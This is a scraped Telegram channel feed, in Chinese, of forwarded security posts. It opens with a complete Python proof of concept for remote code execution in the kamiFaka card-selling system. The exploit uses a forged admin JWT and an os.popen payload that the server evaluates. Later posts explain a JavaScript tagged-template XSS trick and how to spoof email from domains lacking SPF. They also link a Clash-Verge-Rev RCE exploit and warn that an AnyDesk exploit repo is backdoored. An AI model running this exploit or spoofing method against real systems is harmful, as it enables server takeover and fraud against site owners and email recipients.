Forwarded from Puddin在TG上看到了啥
佰阅发卡存在RCE漏洞,省流:eval解析json+硬编码JWT secret
POC:
https://mp.weixin.qq.com/s/3fT7r6bHfzXs7vX0rMI54g
POC:
import requests
cmd = "ls /"
url = "http://xxx"
jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6eyJlbWFpbCI6ImFkbWluQHFxLmNvbSJ9LCJleHAiOjE3NDQ4NzExNDZ9.jf8YjUqXWVschKPSvKjv7lcQZrhynLla6AWqH6WWavg"
resp = requests.post(
url + "/api/v4/update_pays",
headers={"Authorization": "Bearer " + jwt_token},
json={
"data": {
# "config": f"[exec({payload!r}), f()][-1]",
"config": f"__import__('os').popen({cmd!r}).read()",
"icon": "\u652f\u4ed8\u5b9d",
"id": 2,
"info": "0\u8d39\u7387\u5b9e\u65f6\u5230\u8d26",
"isactive": False,
"name": "V\u514d\u7b7e\u652f\u4ed8\u5b9d",
}
},
)
resp = requests.get(
url + "/api/v4/get_pays",
headers={"Authorization": "Bearer " + jwt_token},
)
print([item["config"] for item in resp.json() if item.get("id") == 2].pop())
https://mp.weixin.qq.com/s/3fT7r6bHfzXs7vX0rMI54g
GitHub
GitHub - Baiyuetribe/kamiFaka: 一款基于VUE3.0的高颜值卡密发卡系统,特别适合虚拟商品、知识付费等。
一款基于VUE3.0的高颜值卡密发卡系统,特别适合虚拟商品、知识付费等。. Contribute to Baiyuetribe/kamiFaka development by creating an account on GitHub.
Forwarded from Pseudorandom Thoughts
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Puddin在TG上看到了啥
Forwarded from Puddin在TG上看到了啥
这个东西是JS的标签模板语法,本来是用来标记一个模板的
所以
f`aaa${arg}bbb`
就相当于f(["aaa","bbb"], arg)
所以
''.replace.call`1${/.../}${alert}`
就相当于''.replace.call(["1","",""], /.../, alert)
,也就是把第一个参数转成字符串"1,,"
,用正则/.../
匹配这个字符串,然后传给alert
MDN Web Docs
模板字符串 - JavaScript | MDN
模板字面量是用反引号(`)分隔的字面量,允许多行字符串、带嵌入表达式的字符串插值和一种叫带标签的模板的特殊结构。
Forwarded from Puddin在TG上看到了啥
所以说DNS配置不正确就可以伪造这个域名的邮件...
DNS中MX记录标记这个域名可以发送邮件,SPF记录标记哪些服务器可以用这个域名发送邮件
所以如果一个域名(比如说aaa.com)没有配置SPF,那任意服务器都可以用admin@aaa.com之类的邮箱给别人发邮件...
最后伪造邮件可以用emkei.cz这个网站
https://mp.weixin.qq.com/s/UFUBRg3BL1EMy0urkb6xxA
DNS中MX记录标记这个域名可以发送邮件,SPF记录标记哪些服务器可以用这个域名发送邮件
所以如果一个域名(比如说aaa.com)没有配置SPF,那任意服务器都可以用admin@aaa.com之类的邮箱给别人发邮件...
最后伪造邮件可以用emkei.cz这个网站
https://mp.weixin.qq.com/s/UFUBRg3BL1EMy0urkb6xxA
Forwarded from 新浪维基 (₴łⱠVɆⱤ₩ØⱠ₣)
This media is not supported in your browser
VIEW IN TELEGRAM
Clash-Verge-Rev 公网 RCE
https://github.com/bron1e/Clash-Verge-Rev-RCE
使用DNS重绑定+`0.0.0.0`day提升我们的CSRF,从而绕过SOP和PNA限制,这真的很酷~
https://github.com/bron1e/Clash-Verge-Rev-RCE
使用DNS重绑定+`0.0.0.0`day提升我们的CSRF,从而绕过SOP和PNA限制,这真的很酷~
Forwarded from 蓝点网订阅频道 (山外的鸭子哥)
#系统资讯 由于开发商失误现在所有 Kali Linux 用户必须手动更新 repo 密钥,否则未来几天 Kali Linux 将无法正常安装任何更新。
出现这种情况是因为 Kali Linux 开发者不慎丢失存储库密钥,如果用户不手动更新最新创建的密钥,则安装更新时会因为无法验证签名而失败。
查看全文:https://ourl.co/108901
→欢迎关注:蓝点网订阅频道
→欢迎关注:蓝点网X/Twitter
→联系编辑:山外的鸭子哥
→CN2GIA服务器仅99元/年
出现这种情况是因为 Kali Linux 开发者不慎丢失存储库密钥,如果用户不手动更新最新创建的密钥,则安装更新时会因为无法验证签名而失败。
查看全文:https://ourl.co/108901
→欢迎关注:蓝点网订阅频道
→欢迎关注:蓝点网X/Twitter
→联系编辑:山外的鸭子哥
→CN2GIA服务器仅99元/年
Forwarded from 渊龙Sec安全团队
【情报】最新AnyDesk Exploit存在后门🚨🚨🚨
刚看到我就在想,哎哟AnyDesk出远程命令执行漏洞了🤯
仔细一看,该Exploit存在后门backdoor,请谨慎运行和编译!🧐
后门仓库地址:https://github.com/Yuweixn/Anydesk-Exploit-CVE-2025-12654-RCE-Builder
通过在.vbproj最后的<PropertyGroup>存放恶意荷载,如果编译该项目就会执行命令导致木马上线🧐
刚看到我就在想,哎哟AnyDesk出远程命令执行漏洞了🤯
仔细一看,该Exploit存在后门backdoor,请谨慎运行和编译!🧐
后门仓库地址:https://github.com/Yuweixn/Anydesk-Exploit-CVE-2025-12654-RCE-Builder
通过在.vbproj最后的<PropertyGroup>存放恶意荷载,如果编译该项目就会执行命令导致木马上线🧐